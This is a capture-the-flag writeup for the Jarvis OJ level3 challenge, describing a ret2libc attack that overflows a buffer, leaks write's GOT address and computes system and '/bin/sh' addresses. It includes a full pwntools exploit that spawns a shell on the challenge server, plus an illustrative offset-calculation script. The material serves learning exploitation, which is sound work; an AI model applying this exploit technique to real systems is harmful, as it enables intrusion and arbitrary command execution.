This time the challenge ships a dynamic link library (libc) alongside the ELF program.
A first look at the binary shows nothing unusual in its protections.
Analysis
Opening the binary in IDA, you can see that the read into buf overflows, but there is no suitable target function in the program itself to return to.
Opening the accompanying link library in IDA, however, shows that both the system function and the "/bin/sh" string are present.
So the plan is: overflow through the read function -> call system with the argument "/bin/sh".
The offsets of write, system and /bin/sh can be read from the libc.so file, but the addresses of system and /bin/sh in memory are unknown.
A function has an in-memory address FUNC_ADDR and an offset FUNC_LIBC inside libc, and the difference between the two is the same for every function in the library:
SYS_ADDR - SYS_LIBC == WRITE_ADDR - WRITE_LIBC
So by leaking the address of write and taking the difference between its in-memory address and its offset in the libc file, we can compute the address of system.
Construct the stack frame so that the overflow ends in system("/bin/sh") and get a shell.
Methodology
To get the addresses of system and /bin/sh from the offset equality, first leak the real address of write.
Its real address can be obtained by printing the value stored in write's GOT entry.
So the first step is to output the contents of write_got.
Construct a stack frame that, through the overflow, calls write to print write_got.
Then return to vulnerable_function so that read runs again, overflow a second time into system, and finally get the shell.
Exp
#!/usr/bin/env python
# encoding: utf-8
from pwn import *

# io = process("./level3")
io = remote("pwn2.jarvisoj.com", 9879)

elf = ELF("./level3")
write_plt = elf.plt["write"]   # plt and got are both inside the executable
write_got = elf.got["write"]
func = elf.symbols["vulnerable_function"]

libc = ELF("./libc-2.19.so")
write_libc = libc.symbols["write"]   # libc gives the offsets of functions the program does / does not have
sys_libc = libc.symbols["system"]
bin_libc = next(libc.search("/bin/sh"))

# padding + saved ebp + return address (write@plt) + return address after write (vulnerable_function) + arguments of write(1, write_got, 4)
payload1 = 'a' * 0x88 + 'F**k' + p32(write_plt) + p32(func) + p32(1) + p32(write_got) + p32(4)
io.recvuntil("Input:\n")
io.sendline(payload1)
write_addr = u32(io.recv(4))   # python has no pointers, so *write_got cannot be read directly; it has to be printed and saved

sys_addr = write_addr - write_libc + sys_libc   # use the offset equality to get the real address
bin_addr = write_addr - write_libc + bin_libc

# padding + saved ebp + return address (system) + return address after system (vulnerable_function) + argument of system
payload2 = 'a' * 0x88 + 'F**k' + p32(sys_addr) + p32(func) + p32(bin_addr)
io.recvuntil("Input:\n")
io.sendline(payload2)
io.interactive()
io.close()
Addendum
@m4x pointed out that when running locally, the libc installed on the system takes priority, so the library actually loaded is not the one shipped with the challenge.
This makes the computed addresses wrong locally, while the remote target is not affected.
You can add an if statement and link against a different library for each case to solve this.
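As an added illustration of the offset arithmetic from the analysis section and of the libc-mismatch problem from the addendum (this is example code, not the writeup's exploit), the function below computes the libc load base from a leaked write address and derives system and /bin/sh from it, with the sanity check a practitioner would add: a base that is not page aligned means the offsets came from the wrong libc build. All addresses and offset tables are constructed sample values, not values from the challenge.

```python
# Constructed "symbol tables": the offset of each symbol inside a libc file, i.e. what
# ELF(...).symbols[...] and ELF(...).search(...) return. Two builds are modelled so that
# the effect of computing against the wrong one can be shown. Sample values, not real ones.
LIBC_OFFSETS = {
    "libc-2.19.so": {"write": 0x000dac50, "system": 0x00040310, "/bin/sh": 0x0016084c},
    "libc-local.so": {"write": 0x000e5c10, "system": 0x0003ada0, "/bin/sh": 0x0015ba0b},
}

PAGE = 0x1000          # libc is mapped on a page boundary, so its base must be page aligned
MASK32 = 0xffffffff    # 32-bit process, as in the writeup


def libc_base_from_leak(leaked_addr, symbol_offset):
    """FUNC_ADDR - FUNC_LIBC: the libc load base, which is the same for every symbol."""
    return (leaked_addr - symbol_offset) & MASK32


def same_base(addr_a, off_a, addr_b, off_b):
    """The equality used in the analysis: ADDR_A - OFF_A == ADDR_B - OFF_B."""
    return libc_base_from_leak(addr_a, off_a) == libc_base_from_leak(addr_b, off_b)


def resolve(leaked_write, offsets):
    """Given the leaked runtime address of write and an offset table for one libc build,
    return (base, system_addr, binsh_addr). Raises ValueError when the base is not page
    aligned, the usual symptom of using offsets from a libc other than the loaded one."""
    base = libc_base_from_leak(leaked_write, offsets["write"])
    if base % PAGE != 0:
        raise ValueError("libc base 0x%08x is not page aligned: wrong libc build?" % base)
    system_addr = (base + offsets["system"]) & MASK32
    binsh_addr = (base + offsets["/bin/sh"]) & MASK32
    return base, system_addr, binsh_addr


if __name__ == "__main__":
    # Constructed leak: write of the modelled libc-2.19.so loaded at base 0xb7e0d000.
    leaked_write = 0xb7ee7c50
    base, sys_addr, bin_addr = resolve(leaked_write, LIBC_OFFSETS["libc-2.19.so"])
    print("base=0x%08x system=0x%08x /bin/sh=0x%08x" % (base, sys_addr, bin_addr))
    try:
        resolve(leaked_write, LIBC_OFFSETS["libc-local.so"])
    except ValueError as err:
        print("mismatch detected:", err)
```

A misaligned base proves that the offset table does not belong to the loaded library; an aligned base does not prove a match, so when debugging locally it is still worth pointing ELF() at the library that ldd reports for the binary rather than at the challenge's libc, as the addendum suggests.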
Source: http://www.cnblogs.com/WangAoBo/
If you reproduce this post, please credit the source.
Jarvis OJ - [XMAN]level3 - writeup - a ret2libc attempt